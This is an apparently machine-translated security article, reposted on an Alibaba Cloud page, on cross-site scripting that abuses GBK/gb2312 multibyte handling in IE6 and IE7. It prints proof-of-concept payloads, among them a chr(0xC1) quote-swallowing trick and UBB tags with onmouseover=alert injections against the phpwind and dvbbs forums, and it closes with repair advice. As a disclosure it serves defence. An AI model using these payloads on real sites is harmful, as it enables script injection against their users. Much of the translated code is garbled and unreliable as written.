Cross-site scripting attacks caused by character sets

Source: Internet
Author: User

This type of attack was pointed out by security researchers as early as, but it has not been paid much attention in China. Because most of our sites in China are such vulnerable character sets, the impact is still relatively large, and we hope that all major sites can be quickly repaired. See http://applesoup.googlepages.com /.

In a general web program, a character set is specified when the data is displayed to the browser. In China, the character sets we usually use include UTF-8, GBK, and gb2312, the character set indicates how the browser treats the returned data. Among them, gb2312 and GBK character sets are widely used. However, it has been proved that IE has problems in processing these wide character sets, which may lead to some program security rules being passed, this vulnerability can cause serious cross-site scripting vulnerabilities. In IE, if it encounters a character, it is the first character in the specified character set, it will be considered that its subsequent character and the current character constitute a valid character, in this way, it will take this into consideration when parsing html tags, processing javascript and Css. The test versions are ie6 and ie7.

1 Bypass some js check rules


<HTML>
<HEAD>
<TITLE> 80sec test </TITLE>
<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312"/>
</HEAD>
<BODY>
<Script>
Window. onerror = function (){
Alert (Vul );
Return true;
}
</Script>
<Script> x = <? Php echo chr (0xC1) ;?>; Y = [User_IN_PUT] '; </script>
</BODY>
</HTML>


Here, even if the characters such as <> 'are filtered, the invalid character set sequence can be used to implement the \ function, because it will combine the original, then the front 'cannot find the closure, and the later [User_IN_PUT] can be used to execute js Code.

2 Bypass: Check rules for certain attributes

Some forums and programs use the UBB tag to avoid the vulnerability caused by direct use of html. However, in multi-byte encoding such as gbk, The UBB tag is also prone to problems, take the UBB label that is most prone to problems as an example:


[Color = xyz <? Php echo chr (0xC1);?>] [/Color] [color = abc onmouseover = alert (/xss/) s = <? Php echo chr (0xC1);?>] Exploited [/color]


0xC1 is the first byte of gb2312. The above result will be converted:


<Font color = "xyz?> </Font> <font color = "abc onmouseover = alert (/xss/) s =?> Exploited </font>

Among them, alert (/xss/) will execute an event, so even if the UBB tag becomes insecure, it can be spared. Many forums do not pay attention to this. phpwind, dynamic networks, and other forums are prone to such attacks. Discuz fixes this security problem by attaching a space after the conversion result. The ubb tag is actually an interesting tips in it, because some databases will discard characters that do not match the specified character set, therefore, you must use the following] and other characters to form a valid Chinese character before it can be stored in the database. Of course, there will be no problems like ACCESS, in addition, some languages force the character set type of the string when processing the string. invalid characters may cause transcoding failure or be discarded. Therefore, these types of attacks cannot be exploited.

3. Several small examples

Phpwind Forum charset XSS Vulnerability


[Email = xxxx domains [/email] [email = xxxx onmouseover = alert () s = Alibaba] Fuck Me [/email]
[Font =; 0xc1] xxx [/font] [url = http: // onmouseover = alert () //] xx [/url]


The Delimiter is a special hexadecimal encoding and a combination of the following] characters. The first method can be copied directly :)
0xc1 indicates a hexadecimal character encoding.

Similarly, in the dvbbs forum, it is easy to generate an xss Code as follows:


<Font face = "> xxxxxxxxxxx </font> <font face =" onmouseover = alert () x = regular> xxxxxxxxxxx </font>
Both the new and old versions passed the test.

4. About repair

For programmers, because of the reliability of the UTF-8 character set, there is no such security vulnerability, so you can consider using the UTF-8 character set when designing the site.
For developers, you can keep in mind the principle that the minimum input is equal to the maximum security. When matching regular expressions, You can restrict the range of characters to be entered and try to match ascii characters. If you must use Chinese characters, you can consider adding spaces after Chinese characters similar to discuz to fix this problem.
For the majority of users, this vulnerability can be considered to use a Firefox browser because the browser processes different page characters to avoid some of these problems.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.